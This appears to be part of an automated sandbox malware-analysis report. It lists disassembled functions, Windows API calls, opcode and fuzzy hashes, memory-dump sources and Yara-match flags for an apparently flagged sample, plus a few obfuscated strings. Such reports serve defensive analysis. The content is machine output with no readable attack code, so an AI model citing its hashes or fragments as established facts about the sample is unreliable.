                                            • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,04B436AF,04B337FE,?,00000000,04B32A70,04B32A72,?,04B43828,00000022,00420B0C,00422950,00422958,04B32A70), ref: 04B43661
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 43ead4c681132c66b8243da1a0b96b107cbd3d1581e49affcb3f026fed018730
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: AB210535B05222ABC771AF25EC84A5A3BA8DB82760F1911B0ED05A7391DB30FD02E694
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 04B486B4
                                              • Part of subcall function 04B451BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B45422,?,00000000,-00000008), ref: 04B45220
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B486EC
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B4870C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction ID: b80ae5e50ae296269a7b66f3ff14e2998732001f73dcea1ae0fdeffea4d0a09e
                                            • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction Fuzzy Hash: AD11C0BAA016197F7B213B725CDCCBF2DADCEC959830404B4F905E2100FA60EE01A1B6
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                            • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                            APIs
                                            • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                            • _free.LIBCMT ref: 10006EFE
                                            • _free.LIBCMT ref: 10006F34
                                            • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast_free
                                            • String ID:
                                            • API String ID: 2283115069-0
                                            • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                            • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                            • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                            • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                            • _free.LIBCMT ref: 10007055
                                            • _free.LIBCMT ref: 1000708B
                                            • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast_free
                                            • String ID:
                                            • API String ID: 2283115069-0
                                            • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                            • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                            • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                            • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                            APIs
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CFADA0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CFADB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Value___vcrt_
                                            • String ID:
                                            • API String ID: 1426506684-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: 4984b74ddbc3a4d7bf101f4135ba077788ce0fa155c74b14135f2a0d76b45e70
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 2C0128323083119EB7B027B9BCC4A5B6B56EB013793600239E714520E1FF5EB90261C4
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000), ref: 04B4CE66
                                            • GetLastError.KERNEL32(?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000,00000000,00000000,?,04B4A288,?), ref: 04B4CE72
                                              • Part of subcall function 04B4CE38: CloseHandle.KERNEL32(0042CA30,04B4CE82,?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000,00000000,00000000), ref: 04B4CE48
                                            • ___initconout.LIBCMT ref: 04B4CE82
                                              • Part of subcall function 04B4CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04B4CE29,04B4CAB3,00000000,?,04B49CE5,00000000,00000000,00000000,00000000), ref: 04B4CE0D
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04B4CAC6,00000000,00000001,?,00000000,?,04B49CE5,00000000,00000000,00000000,00000000), ref: 04B4CE97
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: a0a6d5c076a20b86d1f3861068b1a577eaa5dee5553c036911725988add92e7a
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: 23F0303A541118BBCF325F95DC04ACD3F36FF48AA1B414470FA1996130D732A921ABD4
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                            • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                              • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                            • ___initconout.LIBCMT ref: 0041CC1B
                                              • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                            APIs
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                            • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                              • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                            • ___initconout.LIBCMT ref: 1000CD55
                                              • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                            • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                            APIs
                                            • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                            • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                            • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                            • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                            • String ID:
                                            • API String ID: 3269011525-0
                                            • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                            • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                            APIs
                                            • _free.LIBCMT ref: 100067F1
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 10006804
                                            • _free.LIBCMT ref: 10006815
                                            • _free.LIBCMT ref: 10006826
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                            • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                            • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                            • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00410F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction ID: 1dd945e64f0d07477a36e3934c2b0d008af5dc79b4df0e8c4bba017ec81d751d
                                            • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction Fuzzy Hash: 65512B75A0820296CB217714DA023EB6BA49B40750F618D6FF095463E9EBBCCCD7DA4E
                                            APIs
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                            • String ID: vector too long
                                            • API String ID: 3646673767-2873823879
                                            • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                            • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04B3BA66
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 04B3BB1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: d46d4c7a77a2425fa856bb827c536819ff2905282fbc7d0684fd566d69809621
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 4941D330A04218ABCF10DF6AC884A9EBFB5FF44319F1481D5E814AB356DB75FA16CB91
                                            APIs
                                            • RtlEncodePointer.NTDLL(00000000), ref: 04B3C2EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: fcbe1ade2eebc8377b3bf13851ef41adcb22534d1920198d2d7fd1b0be4491c5
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: 99413772900209EFDF25CF99CD80AEEBBB5FF48305F148099E904B7221D335A960DB50
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                            • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B315F3
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: KN$]DFE
                                            • API String ID: 4132704954-873640922
                                            • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction ID: 64122244aa6d14c71d0b99c1c336ccb2368583e332e92bbbfdefda2941a1d826
                                            • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction Fuzzy Hash: 57213AF0F00284CAE724DF69EC457A8B770EF19308F8483A5E4541B261DB7465C6CB5D
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF078C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: KN$]DFE
                                            • API String ID: 1385522511-873640922
                                            • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction ID: 0053214b547fbc7882e5a47014abb901a50d454d7a7590eee5007d299fdef86c
                                            • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction Fuzzy Hash: A3215AF0F00684CAE720DF64EC457A8B761AF09308F44C2A5E5540B261EB7872C2DF5D
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040138C
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: KN$]DFE
                                            • API String ID: 2296764815-873640922
                                            • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                            • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B386E5
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction ID: 58bc2b20522d7a505f5f3ad564cbbd7a56f12507e4a02e337046c3c19a182e8f
                                            • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction Fuzzy Hash: 1401F970F04358DBD720FF7EAD41A5D73A0EB19612FA006A9D11457350DBB4B985C78A
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B38125
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction ID: c470636493ca13b4693f2841becd130eb35744f288b0df1f8917595570533e09
                                            • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
